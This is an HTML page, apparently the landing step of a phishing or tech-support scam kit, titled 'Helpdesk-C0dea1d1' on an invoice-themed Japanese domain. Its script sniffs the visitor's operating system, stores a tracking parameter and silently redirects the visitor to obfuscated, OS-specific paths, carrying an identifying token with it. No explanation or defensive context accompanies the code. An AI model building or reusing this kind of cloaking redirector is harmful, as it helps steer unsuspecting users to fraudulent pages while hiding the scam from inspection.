
<!DOCTYPE html>
<html lang="en">
<head>
<script defer data-domain="jp-invoicedisplay.com/KCcRxp" src="https://api.publytics.net/js/script.manual.min.js"></script>
<script>
    window.publytics = window.publytics || function() { (window.publytics.q = window.publytics.q || []).push(arguments) };
    publytics('pageview');
</script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Helpdesk-C0dea1d1</title>
    <script>
        function getQueryParam(param) {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get(param);
        }
        function checkosSystemForScna() {
            const userAgent = navigator.userAgent;
            let os = "Unknown";
            if (userAgent.indexOf("Win") !== -1) {
                os = "Windows";
            }else if (userAgent.indexOf("iPhone") !== -1) {
                os = "iOS";
            }else if (userAgent.indexOf("Mac") !== -1) {
                os = "MacOS";
            } else if (userAgent.indexOf("Android") !== -1) {
                os = "Android";
            } else if (userAgent.indexOf("Linux") !== -1) {
                os = "Linux";
            }
            return os;
        }
        let operatingSystem = checkosSystemForScna();
        localStorage.setItem('alpha',getQueryParam('alpha'));
        if(operatingSystem === 'MacOS'){
            window.location.href="MerxiC0deinfoJPhtml/?bcda="+getQueryParam('bcda').trim();
        }else if(operatingSystem === 'Android') {
            window.location.href="andx010JPhTml/?bcda="+getQueryParam('bcda').trim();
        }else if(operatingSystem === 'iOS') {
            window.location.href="ioxs010JPhYMl/?bcda="+getQueryParam('bcda').trim();
        }else{
            window.location.href="webC0deinfojphtml/?bcda="+getQueryParam('bcda').trim();
        }
    </script>
</head>
<body>
</body>
</html>
